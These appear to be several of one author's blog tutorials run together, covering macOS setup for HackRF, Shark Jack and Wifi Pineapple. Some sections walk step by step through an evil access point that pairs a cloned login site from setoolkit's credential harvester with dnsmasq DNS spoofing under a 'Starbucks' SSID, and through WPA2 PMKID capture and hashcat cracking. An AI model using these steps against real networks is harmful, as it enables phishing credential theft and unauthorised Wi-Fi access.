I’ve tried many times and different ways but the installation of Gqrx and GNU Radio on macOS Big Sur via MacPorts failed always. I did not give up and found a working solution for me (my HackRF One) and these two needed tools. In this tutorial I would like to show you the installation (Gqrx & GNU Radio). If you need first to install HackRF One on macOS, please have a look here.
Install XQuartz
First download and installation starts with XQuartz. Download the latest DMG, run the installation and logout/login from your system.
Install Gqrx SDR
As already mentioned, Gqrx (at least for me) cannot installed on Big Sur via MacPorts. Therefore download and install the precompiled binary from Gqrx. As soon the installation was successful, you can connect and use the HackRF One.
Install Python 3.7
The third step also requires a download and installation. Look for the version Python 3.7! Any version below will not work.
Install GNU Radio
Finally, at the last step, we can start to download and install GNU Radio. It’s a quite big application, so please be patient while processing. Also the startup of GNU Radio (inside XQuartz) takes always some few seconds.
If you consider the time (download/installation) compared to the MacPorts installation (download/build/installation), a time gain. Of course Xquartz is also needed for MacPorts. Here if you will try via MacPorts:
# install gr-osmosdr (incl hackrf + gnu radio)
$ sudo port install gr-osmosdr
# install gr-fosphor (needed by gnu radio)
$ sudo port install gr-fosphor
# install gqrx
$ sudo port install gqrx
This time it’s about installing HackRF One binaries on the macOS Big Sur. In another later tutorial I will dive deeper into macOS, HackRF ONE and GnuRadio (gnuradio-companion), but not yet. The installation takes place via latest MacPorts.
My first installation failed with a error (even as MacPorts where completely new installed and Command Line Tools where installed, too). I looked into log file and saw a issue with clang version.
# read log file (optional)
$ cat /opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_macports_release_tarballs_ports_science_hackrf/hackrf/main.log
…
clang: error: invalid version number in 'MACOSX_DEPLOYMENT_TARGET=11.0'
…
# show clang version (optional)
$ clang --version
So looked it up on the Internet and saw that the clang version in the new SDK is higher and will solve this issue. To confirm I had a look installed SDK’s.
# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk
To be really sure. Yes new SDK is installed.
# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk MacOSX11.1.sdk
# show xcrun configs (optional)
$ xcrun --sdk macosx11.1 --show-sdk-path
$ xcrun --sdk macosx11.1 --show-sdk-version
Installation
After the installation and verification (yes the new sdk was getting installed), I tried the macPorts installation again.
# install hackrf via mac ports
$ sudo port install hackrf
Test installation
This time all went fine and I could start testing the device.
# show USB device info (optional)
$ ioreg -p IOUSB -l -w 0 -b
# show hackrf info
$ hackrf_info
# start debug (optional)
$ hackrf_debug --si5351c -n 0 -r
# start record
$ hackrf_transfer -r myRecord.raw -f 433780000
# start transmit record
$ hackrf_transfer -t myRecord.raw -f 433780000 -x 20
Many times I’v got asked (directly, via messages or forums) why the macOS internet connection does not work anymore, while using devices like Shark Jack, O.MG Cable and so on. In my tutorials I also did not mention this in detail, because I assumed this should be clear. A big mistake from my side. Therefore now this article. I will now do my best to explain, using a few examples, how to prioritize the services so that you do not lose your internet connection from your macOS. I will use the internet connection via Wifi hotspot.
Note: I show here an specific example for Shark Jack now. But main target is that you understand and can reuse your knowledge also for different other situations.
Network locations
The first part is about macOS network locations. To not destroy your current settings, we will create a new network location (all via command line).
Warning: The following steps will disconnect your internet connection (briefly), because the new created network location is not populated. Read the tutorial carefully before you execute any command!
# list all network locations
$ networksetup -listlocations
# show name of the current location
$ networksetup -getcurrentlocation
# create new location (SharkJackNetwork)
$ networksetup -createlocation SharkJackNetwork
# change location
$ networksetup -switchtolocation SharkJackNetwork
# lists network interfaces (should be empty)
$ networksetup -listallnetworkservices
Services
The newly created network location does not contain any service now. In the next second part we create two (Wifi and Bluetooth), set own DNS server and test. If you have stored your Wifi credentials (see Keychain Access.app), the internet connection will automatically established again.
# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports
# create WI-FI service (named WLAN)
$ networksetup -createnetworkservice WLAN "WI-FI"
# create Bluetooth PAN service (named Bluetooth)
$ networksetup -createnetworkservice Bluetooth "Bluetooth PAN"
# lists network interfaces (WLAN and Bluetooth)
$ networksetup -listallnetworkservices
# add dns server (to WLAN)
$ networksetup -setdnsservers WLAN 8.8.8.8 8.8.4.4
# verify DNS settings (optional)
$ dig +all example.com
My MacBook Pro does not provide an RJ45 interface (only USB-C). Therefore I buyed a Multi-Port-Adapter from Satechi. After plug in, I add this device now to my services. There are many other vendors as well, for such please choose your own name.
# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports
# create adapter service (named Satechi)
$ networksetup -createnetworkservice Satechi "USB 10/100/1000 LAN"
Now it’s time to use Shark Jack. Turn it on (arming mode), plug into adapter, wait for IP and test. If you haven’t changed it, the default IP is “172.16..24.1”, the user is “root” and password is “hak5shark”.
# wait for IP
$ ifconfig en8
# run command over SSH
$ ssh -C4 root@172.16.24.1 -C 'pwd'
# ping google dns
$ ping -c 1 google.com
The internet connection is not working anymore but Wifi seems working correctly!
Service order
Now it comes to the order of all services (prioritization). Here we ensure that internet connection works again.
# show services in the order they are contacted for a connection
$ networksetup -listnetworkserviceorder
# command to designate the order network services are contacted
$ networksetup -ordernetworkservices WLAN Satechi Bluetooth
# ping google dns
$ ping -c 1 google.com
All good now … The newly created network location (incl. services) can be used as soon you develop your Shark Jack payloads. Specific to your environment needs, you can create and use many of these network locations (to quickly switch between).
After you receive your new Shark Jack device from Hak5, you need to upgrade the Firmware. This tiny tutorial will guide you through the process. You should plan a maximum of 10 minutes of your life for this action.
Preparation
Enable the Arming mode (middle switch position) and connect with your RJ45 interface, also connect USB-C for charging. Do not stop charging while the whole upgrade process! In case your local device does not provide such interface, I have really good experience with the multiport adapter from SATECHI.
# download Firmware (via command line)
$ curl -L -C - https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0-stable -o ~/Downloads/upgrade-1.1.0.bin
# verify SHA256 checksum (optional)
$ shasum -a 256 ~/Downloads/upgrade-1.1.0.bin
# copy Firmware from local to Shark Jack device
$ scp -C4 ~/Downloads/upgrade-1.1.0.bin root@172.16.24.1:/tmp/
# SSH into SharkJack device
$ ssh -C4 root@172.16.24.1
# list directory content (optional)
root@shark:~# ls -la
# show current version
root@shark:~# cat VERSION
1.0
# start update
root@shark:~# sysupgrade -n /tmp/upgrade-1.1.0.bin
Now be patient and do not remove the Shark Jack from RJ45 or the USB-C for charging! The device installs the new firmware and reboots. For me it was around 3 – 4 minutes.
# check interface status (optional)
$ ifconfig
# SSH into Shark Jack device
$ ssh -C4 root@172.16.24.1
# show current version
root@shark:~# cat VERSION
1.1.0
With just a few steps it is possible to convert the MacBook into an evil access point. The device already has everything that is necessary in terms of hardware. For the additionally software only an Internet access is is required.
Note: The installation and configuration of Kali Linux VM (inside VirtualBox) is not part of this tutorial.
Objectives
Turn the macOS into wifi hotspot with fake DNS.
Starting position
Via cable (USB-C to Lightning) my MacBook and my IPhone are connected. On the IPhone the Hotspot (USB tethering) is enabled. The Wifi devices is off. Finally there is a Kali Linux VM and SSH access is configured in it.
Step 1: check current local config
Most of the following commands in the first step are optional, only your own IP is important. But this will give you a better understanding of your system.
# show local ip
$ ifconfig en7
[172.20.10.2]
# show system DNS configuration (optional)
$ scutil --dns | grep nameserver
# show network status (optional)
$ netstat -na | grep "\.53"
My interface is en7 and my local IP is 172.20.10.2. For you this can be different! The IPhone is my nameserver 172.20.10.1 (results of scutil) and no service is listen on port 53 (results of netstat).
Step 2: start Kali Linux and clone website
As already mentioned, we are now using the Kali Linux VM. The only important point for VM configuration is that the interface is mode “Bridged Network“.
# list all vm's
$ VBoxManage list vms
# start headless specific vm
$ VBoxManage startvm --type headless "KaliLinux"
# show running vm's (optional)
$ VBoxManage list runningvms
# get IP of vm
$ VBoxManage guestproperty get "KaliLinux" "/VirtualBox/GuestInfo/Net/0/V4/IP"
[172.20.10.3]
# SSH into VM
$ ssh <user>@172.20.10.3
# start setoolkit
$ sudo setoolkit
# select Social-Engineering Attacks
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
set> 1
# select Website Attack Vectors
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
set> 2
# select Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set:webattack> 3
# select Site Cloner
1) Web Templates
2) Site Cloner
3) Custom Import
set:webattack> 2
After the inputs for IP (IP of VM) and domain (URL to clone) you should use an other tab (CMD + t) on your terminal. You can check the cloning result in your browser.
Step 3: clone, build, and run dnsmasq
Now dnsmasq is needed. You can install via brew or download and compile by your self.
# clone latest git repository
$ git clone git://thekelleys.org.uk/dnsmasq.git
# change into cloned directory
$ cd dnsmasq
# build dnsmasq binary
$ make
# show help for dnsmasq
$ sudo ./src/dnsmasq --help
# run dnsmasq
$ sudo ./src/dnsmasq --no-dhcp-interface= --no-daemon --log-queries --no-hosts --no-resolv --no-poll --server=8.8.8.8 --address="/example.com/172.20.10.3"
Dnsmasq runs without DHCP service, without reading /etc/hosts and /etc/resolv.conf. Google IP is given for upstream DNS server.
Step 4: test your DNS
And again you should use an other tab (CMD + t) on your terminal. Now you can verify the dnsmasq configuration.
# flush local DNS
$ sudo killall -HUP mDNSResponder
# dig on local IP
$ dig @172.20.10.2 +short example.com
# dig on localhost
$ dig @localhost +all example.com
# nslookup on local
$ nslookup login.example.com 172.20.10.2
Step 5: create access point
Set the DNS server for the Wi-Fi service and then start the hotspot.
# set DNS server
$ networksetup -setdnsservers Wi-Fi 172.20.10.2
My favorite SSID: Starbucks
Now it’s time to wait… In the meantime, you can find out more about your connected STA’s.
# show STA informations (optional)
$ cat /private/var/db/dhcpd_leases
If you tried out modules like DNSspoof or DNSMasqSpoof on your Wifi Pineapple and had no success, then this tutorial will help you now. I will try my best to show you here a simple (and working) solution. The way differs to other tutorials on internet but should enable you to progress in your daily hacking work.
Objectives
In this example you will learn the basics about DNS Hijacking on Wifi Pineapple (without any additional modules).
Precondition
The ready configured internet share to Wifi Pineapple like in this tutorial, as well a 2nd device (or Virtual Machine) and a running FakeAP (where we later connect).
Step 1: prepare local PHP file and start PHP build-in server
To keep it simple, create the fake target site (incl. server) on your local device. This saves ressources on Wifi Pineapple device and will help more to understand this hole topic.
# create local project
$ mkdir -p ~/Projects/LandingPage
# change into project directory
$ cd ~/Projects/LandingPage
# create index.php file
$ vi ~/Projects/LandingPage/index.php
# start simple PHP server
$ php -S 0.0.0.0:80 index.php
# verify inside local browser (optional)
$ open http://172.16.42.42/
Content of very simple PHP file
<?php
header('Content-Type: text/html; charset=UTF-8');
echo 'hello spoofed DNS victim';
If you understand how all works, have a look on setoolkit.
Step 2: change hosts file and flush DNS
The DNS redirection (example.com to local running server) on the Wifi Pineapple is very easy. Just connect with SSH, modify the hosts file and flush the DNS cache.
However, since there are strong restrictions with this type (for example wildcards are not possible), you should use the DNSMasq configuration “addn-hosts” later. But for now it’s fine.
Step 3: flush DNS and connect to Wifi
Now you can flush the DNS on your device or vm (STA) load the page (example.com). If everything works perfectly you should see now the following content in your browser.
Some weeks ago I wrote the first part about Internet Sharing. There we changed the network configuration on the Wifi Pineapple itself. This time we tweak the network configuration (NAT subnet configurations) so that we can use internet sharing on macOS inside “172.16.42.x” network.
Objectives
Configure Internet Sharing without changing the default settings on Wifi Pineapple (but change defaults on macOS).
Step 1: Prepare for next steps
If you have “Internet Sharing” enabled, now you must switch it off!
Turn on the Wifi Pineapple device and connect via USB (A plug for NANO, ETH plug for TETRA) to your Mac. If everything works fine, following commands should run successful.
The property list (com.apple.nat.plist) is like a contract between the “Sharing preferences pane” and “InternetSharing”. One important property to set there is “SharingNetworkNumberStart” (all other properties, which follow in this tutorial, are optional). This property controls the behavior of InternetSharing when it configures IP addresses for the local interfaces. I choose value 172.16.42.10.
# read the property list (optional)
$ defaults read /Library/Preferences/SystemConfiguration/com.apple.nat.plist
# create backup of the property list file (optional)
$ sudo cp /Library/Preferences/SystemConfiguration/com.apple.nat.plist /Library/Preferences/SystemConfiguration/com.apple.nat.plist.bak
# add start IP
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberStart 172.16.42.10
# add end IP (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberEnd 172.16.42.100
# add network mask (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkMask 255.255.255.0
Step 3: Network configuration
We will deal with 2 interfaces locally (enX and bridge100). Now we configure the “enX” IP first. We do this simply via “Network preferences”. Depending to your Wifi Pineapple device you should see following services:
NANO: AX88x72A
TETRA: USB 10/100 LAN
Select the service and configure like in picture.
Now change the network service order.
After saving, we quickly check everything.
# check interface (in my case it's en5)
$ ifconfig en5
...
inet 172.16.42.10 netmask 0xffffff00 broadcast 172.16.42.255
# ping from wifi pineapple (should not work yet)
$ ssh root@172.16.42.1 -C 'ping -c 1 google.com'
...
ping: sendto: Network unreachable
# check for interface (should not exist)
$ ifconfig bridge100
...
ifconfig: interface bridge100 does not exist
Step 4: Start Internet Sharing
Inside “System Preferences”, click “Sharing”, then select “Internet Sharing”. Configure as in picture.
Step 5: Set bridge100 interface IP
Back to the terminal, here the interface “bridge100” should be visible now. This interface we assign the IP 172.16.42.42.
# show interface information (optional)
$ ifconfig bridge100
# add IP to bridge100 interface
$ sudo ifconfig bridge100 172.16.42.42 netmask 255.255.255.0 up
That’s it already! Via “Bulletins” you can verify.
BTW … Take a look at the following local files, with and without Internet sharing!
# read config file for DHCP
$ defaults read /etc/bootpd.plist
# read internet share config (optional)
$ defaults read /System/Library/LaunchDaemons/com.apple.NetworkSharing.plist
With very little effort and a few tools, you can crack WPA2 WiFi passwords on your macOS. This tutorial will show you how to do it. Bettercap, hcxpcaptool (via Docker) and hashcat are used for this. Please note that these instructions are only used for learning purposes!
Note: In this guide we don’t change the default credentials (user,pass). You can do on file “/usr/local/share/bettercap/caplets/http-ui.cap”!
Open the Browser (http://127.0.0.1:80), login and start Wifi discovery (wifi.recon on). Send some association requests to the selected BSSID (wifi.assoc BSSID). In your home folder you should find the file “bettercap-wifi-handshakes.pcap”.
Finish your Bettercap session when you are done.
Wireshark
Optional you can use Wireshark to verify, if you recorded the PMKID on Robust Secure Network (RSN). Start Wireshark, open the file “bettercap-wifi-handshakes.pcap”, add the filter “eapol && wlan.rsn.ie.pmkid” and search the PMKID(s).
hcxpcaptool
Now you need to convert (extract) the PMKID(s) from the Bettercap pcap file. For this you need the “hcxdumptool” from ZeraBea. Because OpenSSL is needed (and I don’t want to install it), I created a small Alpine Docker image (Dockerfile). You can follow next steps for usage.
# pull the image
$ docker pull slorenz/hcxpcaptool
# create directories
$ mkdir -p ~/Projects/PMKID/cap
# change directory
$ cd ~/Projects/PMKID/
# copy pcap into cap directory
$ cp ~/bettercap-wifi-handshakes.pcap ~/Projects/PMKID/cap/
# run container
$ docker run -ti --rm --mount src="$(pwd)/cap",target=/hcxpcaptool,type=bind slorenz/hcxpcaptool bettercap-wifi-handshakes.pcap
# show content (optional)
$ cat cap/pmkid.16800
Note: The columns (of pmkid.16800 content) are divided by * into following:
PMKID
MAC AP
MAC Station
ESSID
If you have not four columns, you need to repeat all previous steps for recording and convert!
hashcat
That was actually the easy part. Now we use Hashcat to crack the WPA2 passwords. The “only” challenge is the password length and the characters used. The next steps will guide you:
# create directory
$ mkdir -p ~/Projects
# change directory
$ cd ~/Projects
# clone git repository of hashcat
$ git clone https://github.com/hashcat/hashcat.git
# build binary
$ make -C hashcat/
# install binary
$ sudo make install -C hashcat/
# delete cloned repository (optional)
$ rm -fr ~/Projects/hashcat
# show hashcat help (optional)
$ hashcat -h
# run benchmark (optional)
$ hashcat -b
# execute hashcat
$ hashcat -m 16800 pmkid.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
